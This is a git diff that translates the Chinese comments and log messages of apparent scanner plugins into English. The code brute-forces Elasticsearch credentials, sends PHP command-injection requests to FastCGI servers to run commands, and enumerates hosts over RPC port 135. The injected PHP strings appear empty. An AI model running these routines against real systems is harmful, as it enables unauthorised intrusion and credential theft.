diff --git a/Plugins/Elasticsearch.go b/Plugins/Elasticsearch.go index 5d1dddc..feb5198 100644 --- a/Plugins/Elasticsearch.go +++ b/Plugins/Elasticsearch.go @@ -18,20 +18,20 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) { maxRetries := Common.MaxRetries target := fmt.Sprintf("%v:%v", info.Host, info.Ports) - Common.LogDebug(fmt.Sprintf("开始扫描 %s", target)) - Common.LogDebug("尝试无认证访问...") + Common.LogDebug(fmt.Sprintf("Starting scan %s", target)) + Common.LogDebug("Trying unauthenticated access...") - // 首先测试无认证访问 + // First test unauthenticated access for retryCount := 0; retryCount < maxRetries; retryCount++ { if retryCount > 0 { - Common.LogDebug(fmt.Sprintf("第%d次重试无认证访问", retryCount+1)) + Common.LogDebug(fmt.Sprintf("Retrying unauthenticated access for the %d time", retryCount+1)) } flag, err := ElasticConn(info, "", "") if flag && err == nil { - successMsg := fmt.Sprintf("Elasticsearch服务 %s 无需认证", target) + successMsg := fmt.Sprintf("Elasticsearch service %s does not require authentication", target) Common.LogSuccess(successMsg) - // 保存无认证访问结果 + // Save unauthenticated access result result := &Common.ScanResult{ Time: time.Now(), Type: Common.VULN, @@ -57,23 +57,23 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) { totalUsers := len(Common.Userdict["elastic"]) totalPass := len(Common.Passwords) - Common.LogDebug(fmt.Sprintf("开始尝试用户名密码组合 (总用户数: %d, 总密码数: %d)", + Common.LogDebug(fmt.Sprintf("Starting to try username and password combinations (Total users: %d, Total passwords: %d)", totalUsers, totalPass)) tried := 0 total := totalUsers * totalPass - // 遍历所有用户名密码组合 + // Iterate over all username and password combinations for _, user := range Common.Userdict["elastic"] { for _, pass := range Common.Passwords { tried++ pass = strings.Replace(pass, "{user}", user, -1) - Common.LogDebug(fmt.Sprintf("[%d/%d] 尝试: %s:%s", tried, total, user, pass)) + Common.LogDebug(fmt.Sprintf("[%d/%d] Trying: %s:%s", tried, total, user, pass)) - // 重试循环 + // Retry loop for retryCount := 0; retryCount < maxRetries; retryCount++ { if retryCount > 0 { - Common.LogDebug(fmt.Sprintf("第%d次重试: %s:%s", retryCount+1, user, pass)) + Common.LogDebug(fmt.Sprintf("Retrying for the %d time: %s:%s", retryCount+1, user, pass)) } done := make(chan struct { @@ -97,11 +97,11 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) { case result := <-done: err = result.err if result.success && err == nil { - successMsg := fmt.Sprintf("Elasticsearch服务 %s 爆破成功 用户名: %v 密码: %v", + successMsg := fmt.Sprintf("Elasticsearch service %s brute force successful Username: %v Password: %v", target, user, pass) Common.LogSuccess(successMsg) - // 保存弱密码结果 + // Save weak password result vulnResult := &Common.ScanResult{ Time: time.Now(), Type: Common.VULN, @@ -119,11 +119,11 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) { return nil } case <-time.After(time.Duration(Common.Timeout) * time.Second): - err = fmt.Errorf("连接超时") + err = fmt.Errorf("connection timeout") } if err != nil { - errlog := fmt.Sprintf("Elasticsearch服务 %s 尝试失败 用户名: %v 密码: %v 错误: %v", + errlog := fmt.Sprintf("Elasticsearch service %s attempt failed Username: %v Password: %v Error: %v", target, user, pass, err) Common.LogError(errlog) @@ -139,11 +139,11 @@ func ElasticScan(info *Common.HostInfo) (tmperr error) { } } - Common.LogDebug(fmt.Sprintf("扫描完成,共尝试 %d 个组合", tried)) + Common.LogDebug(fmt.Sprintf("Scan completed, tried %d combinations", tried)) return tmperr } -// ElasticConn 尝试 Elasticsearch 连接 +// ElasticConn attempts to connect to Elasticsearch func ElasticConn(info *Common.HostInfo, user string, pass string) (bool, error) { host, port := info.Host, info.Ports timeout := time.Duration(Common.Timeout) * time.Second diff --git a/Plugins/FcgiScan.go b/Plugins/FcgiScan.go index d679d98..a41d487 100644 --- a/Plugins/FcgiScan.go +++ b/Plugins/FcgiScan.go @@ -18,34 +18,34 @@ import ( //https://xz.aliyun.com/t/9544 //https://github.com/wofeiwo/webcgi-exploits -// FcgiScan 执行FastCGI服务器漏洞扫描 +// FcgiScan performs a FastCGI server vulnerability scan func FcgiScan(info *Common.HostInfo) error { - // 如果设置了暴力破解模式则跳过 + // Skip if brute force mode is set if Common.DisableBrute { return nil } - // 设置目标URL路径 + // Set target URL path url := "/etc/issue" if Common.RemotePath != "" { url = Common.RemotePath } addr := fmt.Sprintf("%v:%v", info.Host, info.Ports) - // 构造PHP命令注入代码 + // Construct PHP command injection code var reqParams string - var cutLine = "-----ASDGTasdkk361363s-----\n" // 用于分割命令输出的标记 + var cutLine = "-----ASDGTasdkk361363s-----\n" // Marker for separating command output switch { case Common.Command == "read": - reqParams = "" // 读取模式 + reqParams = "" // Read mode case Common.Command != "": - reqParams = fmt.Sprintf("", Common.Command, cutLine) // 自定义命令 + reqParams = fmt.Sprintf("", Common.Command, cutLine) // Custom command default: - reqParams = fmt.Sprintf("", cutLine) // 默认执行whoami + reqParams = fmt.Sprintf("", cutLine) // Default to whoami } - // 设置FastCGI环境变量 + // Set FastCGI environment variables env := map[string]string{ "SCRIPT_FILENAME": url, "DOCUMENT_ROOT": "/", @@ -54,7 +54,7 @@ func FcgiScan(info *Common.HostInfo) error { "SERVER_PROTOCOL": "HTTP/1.1", } - // 根据请求类型设置对应的环境变量 + // Set corresponding environment variables based on request type if len(reqParams) != 0 { env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams)) env["REQUEST_METHOD"] = "POST" @@ -63,7 +63,7 @@ func FcgiScan(info *Common.HostInfo) error { env["REQUEST_METHOD"] = "GET" } - // 建立FastCGI连接 + // Establish FastCGI connection fcgi, err := New(addr, Common.Timeout) defer func() { if fcgi.rwc != nil { @@ -71,41 +71,41 @@ func FcgiScan(info *Common.HostInfo) error { } }() if err != nil { - fmt.Printf("FastCGI连接失败 %v:%v - %v\n", info.Host, info.Ports, err) + fmt.Printf("FastCGI connection failed %v:%v - %v\n", info.Host, info.Ports, err) return err } - // 发送FastCGI请求 + // Send FastCGI request stdout, stderr, err := fcgi.Request(env, reqParams) if err != nil { - fmt.Printf("FastCGI请求失败 %v:%v - %v\n", info.Host, info.Ports, err) + fmt.Printf("FastCGI request failed %v:%v - %v\n", info.Host, info.Ports, err) return err } - // 处理响应结果 + // Process response result output := string(stdout) var result string if strings.Contains(output, cutLine) { - // 命令执行成功,提取输出结果 + // Command executed successfully, extract output result output = strings.SplitN(output, cutLine, 2)[0] if len(stderr) > 0 { - result = fmt.Sprintf("FastCGI漏洞确认 %v:%v\n命令输出:\n%v\n错误信息:\n%v\n建议尝试其他路径,例如: -path /www/wwwroot/index.php", + result = fmt.Sprintf("FastCGI vulnerability confirmed %v:%v\nCommand output:\n%v\nError message:\n%v\nSuggest trying other paths, e.g., -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr)) } else { - result = fmt.Sprintf("FastCGI漏洞确认 %v:%v\n命令输出:\n%v", + result = fmt.Sprintf("FastCGI vulnerability confirmed %v:%v\nCommand output:\n%v", info.Host, info.Ports, output) } Common.LogSuccess(result) } else if strings.Contains(output, "File not found") || strings.Contains(output, "Content-type") || strings.Contains(output, "Status") { - // 目标存在FastCGI服务但可能路径错误 + // Target has FastCGI service but possibly incorrect path if len(stderr) > 0 { - result = fmt.Sprintf("FastCGI服务确认 %v:%v\n响应:\n%v\n错误信息:\n%v\n建议尝试其他路径,例如: -path /www/wwwroot/index.php", + result = fmt.Sprintf("FastCGI service confirmed %v:%v\nResponse:\n%v\nError message:\n%v\nSuggest trying other paths, e.g., -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr)) } else { - result = fmt.Sprintf("FastCGI服务确认 %v:%v\n响应:\n%v", + result = fmt.Sprintf("FastCGI service confirmed %v:%v\nResponse:\n%v", info.Host, info.Ports, output) } Common.LogSuccess(result) diff --git a/Plugins/FindNet.go b/Plugins/FindNet.go index 8e3fc76..3b4d32b 100644 --- a/Plugins/FindNet.go +++ b/Plugins/FindNet.go @@ -27,30 +27,30 @@ func FindnetScan(info *Common.HostInfo) error { target := fmt.Sprintf("%s:%v", info.Host, 135) conn, err := Common.WrapperTcpWithTimeout("tcp", target, time.Duration(Common.Timeout)*time.Second) if err != nil { - return fmt.Errorf("连接RPC端口失败: %v", err) + return fmt.Errorf("Failed to connect to RPC port: %v", err) } defer conn.Close() if err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second)); err != nil { - return fmt.Errorf("设置超时失败: %v", err) + return fmt.Errorf("Failed to set timeout: %v", err) } if _, err = conn.Write(bufferV1); err != nil { - return fmt.Errorf("发送RPC请求1失败: %v", err) + return fmt.Errorf("Failed to send RPC request 1: %v", err) } reply := make([]byte, 4096) if _, err = conn.Read(reply); err != nil { - return fmt.Errorf("读取RPC响应1失败: %v", err) + return fmt.Errorf("Failed to read RPC response 1: %v", err) } if _, err = conn.Write(bufferV2); err != nil { - return fmt.Errorf("发送RPC请求2失败: %v", err) + return fmt.Errorf("Failed to send RPC request 2: %v", err) } n, err := conn.Read(reply) if err != nil || n < 42 { - return fmt.Errorf("读取RPC响应2失败: %v", err) + return fmt.Errorf("Failed to read RPC response 2: %v", err) } text := reply[42:] @@ -64,7 +64,7 @@ func FindnetScan(info *Common.HostInfo) error { } if !found { - return fmt.Errorf("未找到有效的响应标记") + return fmt.Errorf("No valid response marker found") } return read(text, info.Host) @@ -104,17 +104,17 @@ func isValidHostname(name string) bool { } func isValidNetworkAddress(addr string) bool { - // 检查是否为IPv4或IPv6 + // Check if it's an IPv4 or IPv6 address if ip := net.ParseIP(addr); ip != nil { return true } - // 检查是否为有效主机名 + // Check if it's a valid hostname return isValidHostname(addr) } func cleanAndValidateAddress(data []byte) string { - // 转换为字符串并清理不可打印字符 + // Convert to string and clean non-printable characters addr := strings.Map(func(r rune) rune { if unicode.IsPrint(r) { return r @@ -122,7 +122,7 @@ func cleanAndValidateAddress(data []byte) string { return -1 }, string(data)) - // 移除前后空白 + // Trim leading and trailing whitespace addr = strings.TrimSpace(addr) if isValidNetworkAddress(addr) { @@ -134,7 +134,7 @@ func cleanAndValidateAddress(data []byte) string { func read(text []byte, host string) error { encodedStr := hex.EncodeToString(text) - // 解析主机名 + // Parse hostname var hostName string for i := 0; i < len(encodedStr)-4; i += 4 { if encodedStr[i:i+4] == "0000" { @@ -148,16 +148,16 @@ func read(text []byte, host string) error { name = "" } - // 用于收集地址信息 + // Collect address information var ipv4Addrs []string var ipv6Addrs []string seenAddresses := make(map[string]bool) - // 解析网络信息 + // Parse network information netInfo := strings.Replace(encodedStr, "0700", "", -1) segments := strings.Split(netInfo, "000000") - // 处理每个网络地址 + // Process each network address for _, segment := range segments { if len(segment) == 0 { continue @@ -184,14 +184,14 @@ func read(text []byte, host string) error { } } - // 构建详细信息 + // Build details details := map[string]interface{}{ "hostname": name, "ipv4": ipv4Addrs, "ipv6": ipv6Addrs, } - // 保存扫描结果 + // Save scan result result := &Common.ScanResult{ Time: time.Now(), Type: Common.SERVICE, @@ -201,24 +201,24 @@ func read(text []byte, host string) error { } Common.SaveResult(result) - // 构建控制台输出 + // Build console output var output strings.Builder - output.WriteString("NetInfo 扫描结果") - output.WriteString(fmt.Sprintf("\n目标主机: %s", host)) + output.WriteString("NetInfo Scan Result") + output.WriteString(fmt.Sprintf("\nTarget Host: %s", host)) if name != "" { - output.WriteString(fmt.Sprintf("\n主机名: %s", name)) + output.WriteString(fmt.Sprintf("\nHostname: %s", name)) } - output.WriteString("\n发现的网络接口:") + output.WriteString("\nDiscovered Network Interfaces:") if len(ipv4Addrs) > 0 { - output.WriteString("\n IPv4地址:") + output.WriteString("\n IPv4 Addresses:") for _, addr := range ipv4Addrs { output.WriteString(fmt.Sprintf("\n └─ %s", addr)) } } if len(ipv6Addrs) > 0 { - output.WriteString("\n IPv6地址:") + output.WriteString("\n IPv6 Addresses:") for _, addr := range ipv6Addrs { output.WriteString(fmt.Sprintf("\n └─ %s", addr)) }